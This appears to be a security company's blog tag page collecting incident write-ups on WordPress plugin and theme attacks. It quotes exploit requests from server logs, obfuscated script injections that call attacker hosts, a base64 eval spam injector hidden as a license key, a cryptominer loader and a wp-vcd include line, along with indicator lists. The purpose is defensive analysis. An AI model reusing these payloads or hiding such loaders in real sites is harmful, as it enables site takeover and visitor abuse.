Tag: Wordpress Plugins and Themes

Social Warfare Vulnerability Probes

After a recent disclosure of the Social Warfare plugin vulnerability, we’ve seen massive attacks that inject malicious JavaScripts into the plugin options.

The vulnerability has been patched in version 3.5.3 of the plugin, so not all sites with that plugin are now vulnerable. To find actually vulnerable sites, hackers scan the Internet and probe the sites. However, instead of using the file with code that actually changes the settings, they just specify a file with a PHP code that returns a predefined text for vulnerable sites.

Here are some of the URLs of such probe files detected by our firewall:

<pre>hxxp://<strong>thehuglaw[.]com</strong>/cache/wq.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp2.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp3.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/tresz.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/551.txthxxps://<strong>gist.githubusercontent.com/kolzdnoy71</strong>/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt...</pre>

They have very simple PHP code inside <pre> tags. For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of such files are hosted on compromised third-party sites and, at this point, some of them have already been removed.

Hacked sites are not the only option used by the attackers. We’ve seen them using Pastebin links (Pastebin removes them after abuse reports). Another option that you can see in the list above, is Github, and specifically their Gist service.

In case of the above Gist link, the user who created it (kolzdnoy71) has joined GitHub just on March 27, 2019.

Mar 29, 2019 by Denis Sinegubko

Super Amazon Banners plugin gone rogue

During a recent investigation we found the plugin Super Amazon Banners to be serving malware/spam via the domain seoranker[.]info. We suspect that the domain expired and was registered by somebody else who is using it to serve the malware now.

The plugin causes this javascript to try and load a popup (popupHtml) with many spam links to external sites. Also appears to be causing loading issues and some pages refuse to load at all:

(function() {'use strict'; if (window['shbNetLoaded']) return;window['shbNetLoaded'] = true;var popupHtml =

Here is a screenshot of the code the plugin is trying to load:

The issue was reported to WordPress and the plugin can no longer be downloaded, it was closed. We recommend removing the plugin from your WordPress site if you are using it.

Mar 26, 2019 by Krasimir Konov

Multi-Vector Attack in Server Logs

We recently noticed an increase on suspicious requests in our logs which reveal a planned attack against the Social Warfare plugin. Bad actors added this brand new exploit to an existing campaign, which includes other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php

Malicious Domains and IPs:

IPs:

31.208.43.20991.134.215.23334.194.221.173128.199.114.0162.243.1.231145.239.54.77185.136.85.47222.73.242.180109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.jshxxp://raiserate[.]com/mv.txthxxp://109.234 .34 .22/mv.txthxxps://verybeatifulpear[.]comhxxps://blueeyeswebsite[.]comhxxp://r-y-p[.]org/options.txthxxps://teutorrent.com/wp-includes/js/javascript-mini.js
Mar 25, 2019 by John Castro

Spam Injector Disguised as a License Key

A client reported some weird spam URLs injected on their WordPress website and after an investigation, it turned out that the hacker was hiding the encoded spam injector malware in the following theme file:

./wp-content/themes/toolbox/functions.php

The hacker formatted the encoded injector to look like a theme’s license key trying to distract eyes from suspecting this code and finding the malware:

/**
 * Theme personal token soft descriptor.
 */
function theme_personal_token() {
    // Your personal token key #00118
    $token = <<<KEY
eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJldmFs
KFwiPz5cIi5nemluZmxhdGUoYmFzZTY0X2RlY29kZSgkeCkpKTsiLCJ1cGRhdGUiOiJiWkY3YzZK
SUZNV1wvaXV0UWcxYXlHdkU5eG14RUVCXC9CRnhBbGxrVzEwa2hMODdDN0llcVE3NzQ0czdzMTJk
MFwvNzdtbjd2MmRleFwvXC9pTndveFwvbmRJdzBEeTRiNzBJYUZ3eFVGRGdZTUZuYUF3a2J0YjUz
...
ZlBsemhjNHZNNXlpNFlkdk5SU0JGRFlmQU43R2lJWXdZN0dEcnMyK1wvdGRyc1ZuVHY1cDh3UFN2
eGpHVHp4blkrUFhcL1phODVtbWJcL2lJM3hhXC9mdjFISEl4ZVpHMlRkXC9MYlRUNEFQc3h2XC94
MUU2eTlIY1wvMkhjZHBUNVN3TTUzUnRSRzd1Mnd0S3Ywd3VcL2RcL0FUaGJzczg3OHlQcXJsd0Ur
STJyRkVRNkJEVzNMUVRpYmlqT0laejlNNEg4YTk1eFQ3RHl6TUw1ZHpybVwvcVQ1RFAwbUtXZUNQ
UHdFPSJ9
KEY;
    if( $token = json_decode( base64_decode( $token ), true ) ) {
        $token['license'] = $token['license']( $token['account'], $token['theme'] );
        $token['license']( $token['update'] );
    }
}
add_action( 'wp_footer', 'theme_personal_token' );

The injected code contained a few layers of encoding to further obfuscate it from detection, but we can begin by decoding the base64-encoded text within the $token variable:

{"license":"create_function","account":"$x","theme":"eval(\"?>\".gzinflate(base64_decode($x)));","update":"bZF7c6JIFMW\/iutQg1ayGvE9xmxEEB\/BFxAllkW10khL87C7IeqQ7744s7s12d0\/77mn7v2dex\/\/iNwox\/ndIw0Dy4b70IaFwxUFDgYMFnaAwkbtb53Hry+7HVUP0lx4nagtPB4IRHPoKhp5WgUfpso0WEwmpNG8zDzQjNv6UDhLZ+iY1VmtIpPVsG43kDR8d+vjiUJG7eVUqRwNJYjkPdbvjn2g...skipped...\/LbTT4APsxv\/x1E6y9Hc\/2HcdpT5SwM53RtRG7u2wtKv0wu\/d\/AThbss878yPqrlwE+I2rFEQ6BDW3LQTibijOIZz9M4H8a95xT7DyzML5dzrm\/qT5DP0mKWeCPPwE="}

As shown by the above decoded content, we can see that the hacker is still trying to disguise the malware as a type of licensing key for a theme.

This conditional if statement also checked for the user agents, showing the spam URLs to any and all other user agents/search engines except the ones shown below. It tried to hide it from some web-based link-analyzing tools as it may be cached by such tools and the client may be notified:

if(!preg_match('#ia_archiver|Baidu|MJ12|Ezooms|Solomono|roger|Linkpad|Semrush|prodvigator|Survey|Alexi|Xenu|Ahrefs|serpstat|Yandex#i', $k)

The final decoded payload with hidden links as it would appear within the HTML source:

<a href="hps://credit-10[.]com/no/komplett-bank-logg-inn/" style="position:absolute;left:-9998px;">komplett bank min side</a><a href="hxxp://emporium[.]com.ua/answear" style="position:absolute;left:-9998px;">промокод ансвер</a><a href="hxxps://evehealth[.]ru/promokody/shops/promokody-onetwotrip" style="position:absolute;left:-9998px;">onetwotrip промокод</a><a href="hxxps://promocodius[.]com/us/shops/iherb" style="position:absolute;left:-9998px;">iherb coupon</a>

The links are hard-coded inside this malware, but on different sites they may be different. The domains of the spammy sites remain mostly the same though.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Jan 7, 2019 by Moe Obaid

Side Effects of the Site_url Hack

We\'ve been cleaning many sites infected by the so-called site_url hack–the result of the WP GDPR Compliance plugin vulnerability. The sites are broken because their static resource links point to some third party site. However, this is not the only issue.

If a user starts to make changes in their WordPress settings or some plugin regularly updates them, chances are the changes will be affected by the new value of the site_url option. In such cases, you’ll have to search the whole WordPress database (or at least the wp_options table) and files on the server for the rogue site_url value in order to revert the changes.****

For example, this is what your site’s .htaccess file may end up looking like after this hack:

# MediaAce Rules - Hotlink protection
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_URI} !/wp-content/plugins/media-ace/assets/hotlink-placeholder.png$
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?wtools.io/code/raw/so? [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?facebook\.com [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?google\.*$/.* [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?pinterest\.*$/.* [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ hxxp://wtools[.]io/code/raw/so?/wp-content/plugins/media-ace/assets/hotlink-placeholder.png [NC,R,L]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /code/raw/so/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /code/raw/so/index.php [L]
</IfModule>

# END WordPress

As you can guess, in this case, hackers changed the site_url to hxxp://wtools[.]io/code/raw/so?, so the media-ace plugin and main WordPress rewrite rules were corrupted.

Nov 20, 2018 by Denis Sinegubko

JQuory: Cryptomining in Nulled Themes and Plugins.

Three months ago b>@ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, uses the didOptOut function despite the fact that it relies on the coinhive[.]com/lib/coinhive.min.js, which doesn’t involve any opt-out screens.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below, is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {  wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );  wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );}

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero

Nulled software is long known for coming with an undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about security and reputation of your websites.

Jun 5, 2018 by Denis Sinegubko

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top

<?php if (file_exists(dirname(FILE) . '/class.theme-modules.php')) include_once(dirname(FILE) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file that is included by the code added in the functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest malicious files.

The beginning of the file looks like this

<?php //install_code1error_reporting(0);ini_set('display_errors', 0);DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']);$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may be not that easy as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.

Dec 6, 2017 by Denis Sinegubko